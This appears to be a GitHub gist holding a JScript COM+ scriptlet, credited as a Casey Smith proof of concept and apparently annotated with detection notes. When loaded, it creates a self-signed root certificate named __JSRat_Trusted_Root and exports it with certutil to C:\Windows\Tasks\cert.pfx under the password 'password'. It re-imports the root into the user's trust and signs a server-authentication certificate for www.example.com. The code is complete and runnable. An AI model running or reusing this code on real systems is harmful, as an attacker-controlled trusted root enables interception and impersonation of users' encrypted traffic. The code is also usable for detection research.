
@AV1080p
Created December 2, 2020 11:00
JavaScript - Certificate Generate and Enroll - COM+Scriptlet
<?XML version="1.0"?>
<scriptlet>
<registration
progid="JSCertEnroll"
classid="{FFFF1111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD 3-Clause -->
<script language="JScript">
<![CDATA[
// InvokeCreateCertificate(certSubject, isCA)
// Builds an X.509 certificate through the Windows CertEnroll COM objects
// (X509Enrollment.*) and installs it in the current user's context.
//   certSubject - common name; encoded as "CN=" + certSubject for the subject.
//   isCA        - truthy: no signer certificate is set, a Basic Constraints
//                 extension is added, and the result is exported to and
//                 re-imported from a PFX file with certutil.
//                 falsy: the request is signed with the certificate that
//                 `certutil -store -user MY __JSRat_Trusted_Root` reports.
// Returns nothing. No COM or certutil failure is handled anywhere in the body.
//
// Artifacts this function leaves for detection and triage (all literal in the code):
//   - certutil started by the script host with -store, -exportPFX and -importpfx
//   - the file C:\Windows\Tasks\cert.pfx
//   - certificates whose issuer is CN=__JSRat_Trusted_Root in the user's stores
//   - the PFX password "password", which also appears on the certutil command line
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
// The issuer name is fixed, whatever subject was requested.
var issuer = "__JSRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
// X509KeySpec: 2 is XCN_AT_SIGNATURE (CA branch), 1 is XCN_AT_KEYEXCHANGE (leaf branch).
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
// NOTE(review): a 1024-bit RSA key is below the 2048-bit minimum that current
// guidance and most validators require; a certificate with this key size is itself a
// useful hunting attribute.
key.Length = 1024;
// 0 = key is created in the user context, not the machine context.
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
// 11 = 1 | 2 | 8. NOTE(review): in X509PrivateKeyExportFlags these bits look like
// export, plaintext export and plaintext archiving, i.e. the private key is
// deliberately left exportable - confirm against the reference above.
key.ExportPolicy = 11;
key.Create() ;
// 1.3.6.1.5.5.7.3.1 is the Server Authentication EKU (id-kp-serverAuth);
// it is added to the CA certificate as well as to the leaf.
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
// First argument 1 = user enrollment context (ContextUser).
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
// Validity window is hard-coded; NotBefore is back-dated to 2014.
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
// Basic Constraints: CA flag set, path length constraint 1.
// NOTE(review): the CA flag is passed as the string "true" and relies on COM
// coercion to a boolean - confirm.
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
// 2 = AllowUntrustedCertificate: the response is installed although it does not
// chain to an already trusted root.
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
// Lists the just-installed certificate in the user's MY store and scrapes the
// serial number from the text output: line index 2, the text after the first ':',
// then the second space-separated token. This depends on certutil's output layout
// and throws if the output has fewer than three lines.
var oExec = oShell.Exec('certutil -store -user MY __JSRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
// Exports certificate and private key to a PFX under C:\Windows\Tasks.
// NOTE(review): the password is the literal "password" and is passed on the
// command line, so it is recorded wherever process command lines are logged.
var oExec = oShell.Exec('certutil -exportPFX -p password -user My '+ serial +' C:\\Windows\\Tasks\\cert.pfx');
// Crude delay: spins until about 5 seconds have elapsed or 1e7 iterations have
// run, whichever comes first. It does not wait on the certutil process above.
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > 5000){
break;
}
}
// Re-imports the PFX in the user context with -f (force).
// NOTE(review): the visible code does not name the destination store; presumably
// this step is what makes the self-signed root trusted for the user - confirm.
// The PFX file is never deleted afterwards.
var oExec = oShell.Exec('certutil -f -p password -user -importpfx C:\\Windows\\Tasks\\cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
// Same certutil lookup and output scraping as the CA branch; it only finds
// something if a certificate named __JSRat_Trusted_Root is already in the user's
// MY store.
var oExec = oShell.Exec('certutil -store -user MY __JSRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
// Arguments: user context (0), no private-key verification (0), hex string
// encoding (4), then the value scraped from certutil, used to locate the
// signing certificate.
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
// 2 = AllowUntrustedCertificate, as in the CA branch.
enrollment.InstallResponse(2, certdata, 0, "");
}
}
// Top-level statements: both calls run when the host evaluates this <script>
// block, not on an explicit method call.
// Order matters: the first call creates CN=__JSRat_Trusted_Root; the second
// call's non-CA branch looks that certificate up with certutil and uses it to
// sign a Server Authentication certificate for www.example.com.
InvokeCreateCertificate("__JSRat_Trusted_Root", true);
InvokeCreateCertificate("www.example.com", false);
]]>
</script>
</registration>
</scriptlet>